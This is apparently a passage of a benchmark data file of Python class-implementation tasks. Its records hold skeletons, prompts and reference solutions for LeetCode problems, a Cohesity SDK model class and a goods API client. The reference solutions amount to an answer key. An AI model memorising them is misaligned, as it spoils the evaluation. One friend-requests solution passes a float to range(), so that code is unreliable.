121\n for age in ages:\n count[age] += 1\n ans = 0\n for ageA, countA in enumerate(count):\n for ageB, countB in enumerate(count):\n if ageA * 0.5 + 7 >= ageB:\n continue\n if ageA < ageB:\n continue\n if ageA < 100 < ageB:\n continue\n ans += countA * countB\n if ageA == ageB:\n ans -= countA\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n bucket = [0] * 121\n ct = collections.Counter()\n ans = 0\n for age in ages:\n ct[age] += 1\n a, b = (age / 2 + 8, age)\n for i in range(a, b):\n bucket[i] += 1\n for age in ages:\n ans += bucket[age]\n for k, v in ct.items():\n if v > 1 and k > 14:\n ans += v * (v - 1)\n return ans\n<|end_body_1|>\n", "revision_id": "0e99f9a5226507706b3ee66fd04bae813755ef40", "skeleton": "<|skeleton|>\nclass Solution:\n\n def numFriendRequests_1(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def numFriendRequests_2(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def numFriendRequests_1(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n count = [0] * 121\n for age in ages:\n count[age] += 1\n ans = 0\n for ageA, countA in enumerate(count):\n for ageB, countB in enumerate(count):\n if ageA * 0.5 + 7 >= ageB:\n continue\n if ageA < ageB:\n continue\n if ageA < 100 < ageB:\n continue\n ans += countA * countB\n if ageA == ageB:\n ans -= countA\n return ans\n\n def numFriendRequests_2(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n bucket = [0] * 121\n ct = collections.Counter()\n ans = 0\n for age in ages:\n ct[age] += 1\n a, b = (age / 2 + 8, age)\n for i in range(a, b):\n bucket[i] += 1\n for age in ages:\n ans += bucket[age]\n for k, v in ct.items():\n if v > 1 and k > 14:\n ans += v * (v - 1)\n return ans\n", "source": "the_stack_v2_python_sparse", "source_path": "medium/arrayandstring/test_825_Friends_Of_Appropriate_Ages.py", "source_repo": "wuxu1019/leetcode_sophia", "split": "test", "star_events_count": 1} {"blob_id": "bc1c98d3c79c8ef00f632237abf90120927a5443", "bodies": ["n = len(s)\nadjMap = defaultdict(set)\nfor start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\nqueue = deque([0])\nvisited = set([0])\ndepth = 0\nwhile queue:\n curLen = len(queue)\n for _ in range(curLen):\n cur = queue.popleft()\n if cur == n:\n return depth - 1\n for next in adjMap[cur]:\n if next not in visited:\n visited.add(next)\n queue.append(next)\n depth += 1\nreturn n - 1", "n = len(s)\nadjMap = defaultdict(set)\nfor start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n\n@lru_cache(None)\ndef dfs(index: int) -> int:\n if index >= n:\n return 0\n return min((1 + dfs(next) for next in adjMap[index]))\nreturn dfs(0) - 1"], "bodies_text": "<|body_start_0|>\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 
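Editor's note on the friend-requests record above: the bucket variant numFriendRequests_2 computes a, b = (age / 2 + 8, age) and then calls range(a, b); under Python 3, age / 2 is a float, so range raises TypeError. A corrected, self-contained sketch that keeps the same counting rule (A requests B iff age/2 + 7 < ageB <= ageA), counting by distinct age instead of by bucket:

import collections

def num_friend_requests(ages):
    count = collections.Counter(ages)
    ans = 0
    for a, ca in count.items():
        for b, cb in count.items():
            # skip pairs that violate the request rule
            if a * 0.5 + 7 >= b or b > a:
                continue
            # same-age pairs exclude self-requests: ca * (ca - 1)
            ans += ca * cb if a != b else ca * (ca - 1)
    return ans

print(num_friend_requests([16, 17, 18]))            # 2: 17->16, 18->17
print(num_friend_requests([20, 30, 100, 110, 120])) # 3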
1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n queue = deque([0])\n visited = set([0])\n depth = 0\n while queue:\n curLen = len(queue)\n for _ in range(curLen):\n cur = queue.popleft()\n if cur == n:\n return depth - 1\n for next in adjMap[cur]:\n if next not in visited:\n visited.add(next)\n queue.append(next)\n depth += 1\n return n - 1\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n\n @lru_cache(None)\n def dfs(index: int) -> int:\n if index >= n:\n return 0\n return min((1 + dfs(next) for next in adjMap[index]))\n return dfs(0) - 1\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def minCut(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n <|body_0|>\n\n def minCut2(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n queue = deque([0])\n visited = set([0])\n depth = 0\n while queue:\n curLen = len(queue)\n for _ in range(curLen):\n cur = queue.popleft()\n if cur == n:\n return depth - 1\n for next in adjMap[cur]:\n if next not in visited:\n visited.add(next)\n queue.append(next)\n depth += 1\n return n - 1\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n\n @lru_cache(None)\n def dfs(index: int) -> int:\n if index >= n:\n return 0\n return min((1 + dfs(next) for next in adjMap[index]))\n return dfs(0) - 1\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000086", "length_bytes": 2494, "license_type": "no_license", "methods": [{"docstring": ":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。", "name": "minCut", "signature": "def minCut(self, s: str) -> int"}, {"docstring": ":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。", "name": "minCut2", "signature": "def minCut2(self, s: str) -> int"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minCut(self, s: str) -> int: :给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\n- def minCut2(self, s: str) -> int: :给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass 
description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minCut(self, s: str) -> int: :给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\n- def minCut2(self, s: str) -> int: :给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\n\n<|skeleton|>\nclass Solution:\n\n def minCut(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n <|body_0|>\n\n def minCut2(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n queue = deque([0])\n visited = set([0])\n depth = 0\n while queue:\n curLen = len(queue)\n for _ in range(curLen):\n cur = queue.popleft()\n if cur == n:\n return depth - 1\n for next in adjMap[cur]:\n if next not in visited:\n visited.add(next)\n queue.append(next)\n depth += 1\n return n - 1\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n\n @lru_cache(None)\n def dfs(index: int) -> int:\n if index >= n:\n return 0\n return min((1 + dfs(next) for next in adjMap[index]))\n return dfs(0) - 1\n<|end_body_1|>\n", "revision_id": "7e79e26bb8f641868561b186e34c1127ed63c9e0", "skeleton": "<|skeleton|>\nclass Solution:\n\n def minCut(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n <|body_0|>\n\n def minCut2(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def minCut(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n queue = deque([0])\n visited = set([0])\n depth = 0\n while queue:\n curLen = len(queue)\n for _ in range(curLen):\n cur = queue.popleft()\n if cur == n:\n return depth - 1\n for next in adjMap[cur]:\n if next not in visited:\n visited.add(next)\n queue.append(next)\n depth += 1\n return n - 1\n\n def minCut2(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n\n @lru_cache(None)\n def dfs(index: 
int) -> int:\n if index >= n:\n return 0\n return min((1 + dfs(next) for next in adjMap[index]))\n return dfs(0) - 1\n", "source": "the_stack_v2_python_sparse", "source_path": "11_动态规划/dp分类/区间dp/dfs/回文/分割回文串/132_分割回文串-最短路建图.py", "source_repo": "981377660LMT/algorithm-study", "split": "test", "star_events_count": 225} {"blob_id": "fc0a960b86f0d98bf58a4f1720137d78acd42a85", "bodies": ["self.end_time_usecs = end_time_usecs\nself.error = error\nself.indexing_task_end_time_usecs = indexing_task_end_time_usecs\nself.indexing_task_start_time_usecs = indexing_task_start_time_usecs\nself.indexing_task_status = indexing_task_status\nself.indexing_task_uid = indexing_task_uid\nself.latest_expiry_time_usecs = latest_expiry_time_usecs\nself.progress_monitor_task = progress_monitor_task\nself.start_time_usecs = start_time_usecs", "if dictionary is None:\n return None\nend_time_usecs = dictionary.get('endTimeUsecs')\nerror = dictionary.get('error')\nindexing_task_end_time_usecs = dictionary.get('indexingTaskEndTimeUsecs')\nindexing_task_start_time_usecs = dictionary.get('indexingTaskStartTimeUsecs')\nindexing_task_status = dictionary.get('indexingTaskStatus')\nindexing_task_uid = cohesity_management_sdk.models.universal_id.UniversalId.from_dictionary(dictionary.get('indexingTaskUid')) if dictionary.get('indexingTaskUid') else None\nlatest_expiry_time_usecs = dictionary.get('latestExpiryTimeUsecs')\nprogress_monitor_task = dictionary.get('progressMonitorTask')\nstart_time_usecs = dictionary.get('startTimeUsecs')\nreturn cls(end_time_usecs, error, indexing_task_end_time_usecs, indexing_task_start_time_usecs, indexing_task_status, indexing_task_uid, latest_expiry_time_usecs, progress_monitor_task, start_time_usecs)"], "bodies_text": "<|body_start_0|>\n self.end_time_usecs = end_time_usecs\n self.error = error\n self.indexing_task_end_time_usecs = indexing_task_end_time_usecs\n self.indexing_task_start_time_usecs = indexing_task_start_time_usecs\n self.indexing_task_status = indexing_task_status\n self.indexing_task_uid = indexing_task_uid\n self.latest_expiry_time_usecs = latest_expiry_time_usecs\n self.progress_monitor_task = progress_monitor_task\n self.start_time_usecs = start_time_usecs\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n end_time_usecs = dictionary.get('endTimeUsecs')\n error = dictionary.get('error')\n indexing_task_end_time_usecs = dictionary.get('indexingTaskEndTimeUsecs')\n indexing_task_start_time_usecs = dictionary.get('indexingTaskStartTimeUsecs')\n indexing_task_status = dictionary.get('indexingTaskStatus')\n indexing_task_uid = cohesity_management_sdk.models.universal_id.UniversalId.from_dictionary(dictionary.get('indexingTaskUid')) if dictionary.get('indexingTaskUid') else None\n latest_expiry_time_usecs = dictionary.get('latestExpiryTimeUsecs')\n progress_monitor_task = dictionary.get('progressMonitorTask')\n start_time_usecs = dictionary.get('startTimeUsecs')\n return cls(end_time_usecs, error, indexing_task_end_time_usecs, indexing_task_start_time_usecs, indexing_task_status, indexing_task_uid, latest_expiry_time_usecs, progress_monitor_task, start_time_usecs)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. 
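Editor's note on the palindrome-partition record above: both variants first build, for each index i, the set of indices j reachable by consuming one palindromic piece s[i:j] (found by expanding around every center), then take a shortest path from 0 to n; the BFS depth is the number of pieces, so cuts = depth - 1. A compact runnable version of the BFS variant:

from collections import defaultdict, deque

def min_cut(s: str) -> int:
    # build jump edges i -> j whenever s[i:j] is a palindrome, by
    # expanding around odd and even centers (same construction as above)
    n = len(s)
    adj = defaultdict(set)
    for c in range(n):
        for l, r in ((c, c), (c, c + 1)):
            while l >= 0 and r < n and s[l] == s[r]:
                adj[l].add(r + 1)
                l -= 1
                r += 1
    # BFS over jump edges: depth = pieces used, cuts = depth - 1
    queue, seen, depth = deque([0]), {0}, 0
    while queue:
        for _ in range(len(queue)):
            cur = queue.popleft()
            if cur == n:
                return depth - 1
            for nxt in adj[cur]:
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append(nxt)
        depth += 1
    return n - 1

print(min_cut('aab'))  # 1: 'aa' | 'b'
print(min_cut('aba'))  # 0: already a palindrome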
This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. indexing_task_st", "class_name": "RemoteRestoreIndexingStatus", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RemoteRestoreIndexingStatus:\n \"\"\"Implementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. indexing_task_st\"\"\"\n\n def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None):\n \"\"\"Constructor for the RemoteRestoreIndexingStatus class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.end_time_usecs = end_time_usecs\n self.error = error\n self.indexing_task_end_time_usecs = indexing_task_end_time_usecs\n self.indexing_task_start_time_usecs = indexing_task_start_time_usecs\n self.indexing_task_status = indexing_task_status\n self.indexing_task_uid = indexing_task_uid\n self.latest_expiry_time_usecs = latest_expiry_time_usecs\n self.progress_monitor_task = progress_monitor_task\n self.start_time_usecs = start_time_usecs\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n end_time_usecs = dictionary.get('endTimeUsecs')\n error = dictionary.get('error')\n indexing_task_end_time_usecs = dictionary.get('indexingTaskEndTimeUsecs')\n indexing_task_start_time_usecs = dictionary.get('indexingTaskStartTimeUsecs')\n indexing_task_status = dictionary.get('indexingTaskStatus')\n indexing_task_uid = cohesity_management_sdk.models.universal_id.UniversalId.from_dictionary(dictionary.get('indexingTaskUid')) if dictionary.get('indexingTaskUid') else None\n latest_expiry_time_usecs = dictionary.get('latestExpiryTimeUsecs')\n progress_monitor_task = dictionary.get('progressMonitorTask')\n start_time_usecs = dictionary.get('startTimeUsecs')\n return cls(end_time_usecs, error, indexing_task_end_time_usecs, indexing_task_start_time_usecs, indexing_task_status, indexing_task_uid, latest_expiry_time_usecs, progress_monitor_task, start_time_usecs)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000087", "length_bytes": 5666, "license_type": "permissive", "methods": [{"docstring": "Constructor for the RemoteRestoreIndexingStatus class", "name": "__init__", "signature": "def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005922", "prompt": "Implement the Python class `RemoteRestoreIndexingStatus` described below.\n\nClass description:\nImplementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. 
indexing_task_st\n\nMethod signatures and docstrings:\n- def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None): Constructor for the RemoteRestoreIndexingStatus class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `RemoteRestoreIndexingStatus` described below.\n\nClass description:\nImplementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. indexing_task_st\n\nMethod signatures and docstrings:\n- def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None): Constructor for the RemoteRestoreIndexingStatus class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass RemoteRestoreIndexingStatus:\n \"\"\"Implementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. 
indexing_task_st\"\"\"\n\n def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None):\n \"\"\"Constructor for the RemoteRestoreIndexingStatus class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.end_time_usecs = end_time_usecs\n self.error = error\n self.indexing_task_end_time_usecs = indexing_task_end_time_usecs\n self.indexing_task_start_time_usecs = indexing_task_start_time_usecs\n self.indexing_task_status = indexing_task_status\n self.indexing_task_uid = indexing_task_uid\n self.latest_expiry_time_usecs = latest_expiry_time_usecs\n self.progress_monitor_task = progress_monitor_task\n self.start_time_usecs = start_time_usecs\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n end_time_usecs = dictionary.get('endTimeUsecs')\n error = dictionary.get('error')\n indexing_task_end_time_usecs = dictionary.get('indexingTaskEndTimeUsecs')\n indexing_task_start_time_usecs = dictionary.get('indexingTaskStartTimeUsecs')\n indexing_task_status = dictionary.get('indexingTaskStatus')\n indexing_task_uid = cohesity_management_sdk.models.universal_id.UniversalId.from_dictionary(dictionary.get('indexingTaskUid')) if dictionary.get('indexingTaskUid') else None\n latest_expiry_time_usecs = dictionary.get('latestExpiryTimeUsecs')\n progress_monitor_task = dictionary.get('progressMonitorTask')\n start_time_usecs = dictionary.get('startTimeUsecs')\n return cls(end_time_usecs, error, indexing_task_end_time_usecs, indexing_task_start_time_usecs, indexing_task_status, indexing_task_uid, latest_expiry_time_usecs, progress_monitor_task, start_time_usecs)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass RemoteRestoreIndexingStatus:\n \"\"\"Implementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. 
indexing_task_st\"\"\"\n\n def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None):\n \"\"\"Constructor for the RemoteRestoreIndexingStatus class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RemoteRestoreIndexingStatus:\n \"\"\"Implementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. indexing_task_st\"\"\"\n\n def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None):\n \"\"\"Constructor for the RemoteRestoreIndexingStatus class\"\"\"\n self.end_time_usecs = end_time_usecs\n self.error = error\n self.indexing_task_end_time_usecs = indexing_task_end_time_usecs\n self.indexing_task_start_time_usecs = indexing_task_start_time_usecs\n self.indexing_task_status = indexing_task_status\n self.indexing_task_uid = indexing_task_uid\n self.latest_expiry_time_usecs = latest_expiry_time_usecs\n self.progress_monitor_task = progress_monitor_task\n self.start_time_usecs = start_time_usecs\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n end_time_usecs = dictionary.get('endTimeUsecs')\n error = dictionary.get('error')\n indexing_task_end_time_usecs = dictionary.get('indexingTaskEndTimeUsecs')\n indexing_task_start_time_usecs = dictionary.get('indexingTaskStartTimeUsecs')\n indexing_task_status = dictionary.get('indexingTaskStatus')\n indexing_task_uid = cohesity_management_sdk.models.universal_id.UniversalId.from_dictionary(dictionary.get('indexingTaskUid')) if dictionary.get('indexingTaskUid') else None\n latest_expiry_time_usecs = dictionary.get('latestExpiryTimeUsecs')\n progress_monitor_task = dictionary.get('progressMonitorTask')\n start_time_usecs = dictionary.get('startTimeUsecs')\n return cls(end_time_usecs, error, indexing_task_end_time_usecs, indexing_task_start_time_usecs, indexing_task_status, indexing_task_uid, latest_expiry_time_usecs, progress_monitor_task, start_time_usecs)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/remote_restore_indexing_status.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "ee13ea769fd21ec674b0316d052d7a3838685764", "bodies": ["url = host + '/api/goods/find'\ndata = {'sku': sku, 'gid': goods_id}\nr = requests.post(url=url, data=data).json()\nout_format('获取单品:', r)", "url = host + '/api/goods/line'\ndata = {'sku': sku, 'gid': goods_id}\nr = requests.post(url=url, data=data).json()\nout_format('获取单品价格和属性:', r)\nreturn r", "url = host + '/api/goods/comment'\ndata = {'gid': goods_id, 'size': '10', 'page': '1'}\nr = requests.post(url=url, json=data).json()\nout_format('获取评论列表:', r)\nreturn r"], "bodies_text": "<|body_start_0|>\n url = host + '/api/goods/find'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品:', r)\n<|end_body_0|>\n\n<|body_start_1|>\n url = host + '/api/goods/line'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品价格和属性:', r)\n return r\n<|end_body_1|>\n\n<|body_start_2|>\n url = host + '/api/goods/comment'\n data = {'gid': goods_id, 'size': '10', 'page': '1'}\n r = requests.post(url=url, json=data).json()\n out_format('获取评论列表:', r)\n return r\n<|end_body_2|>\n", "class_docstring": "", "class_name": "goods", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass goods:\n\n def get_goods(self):\n \"\"\"获取单品 :return: gid\"\"\"\n <|body_0|>\n\n def get_price(self):\n \"\"\"获取单品价格和属性 :return:\"\"\"\n <|body_1|>\n\n def 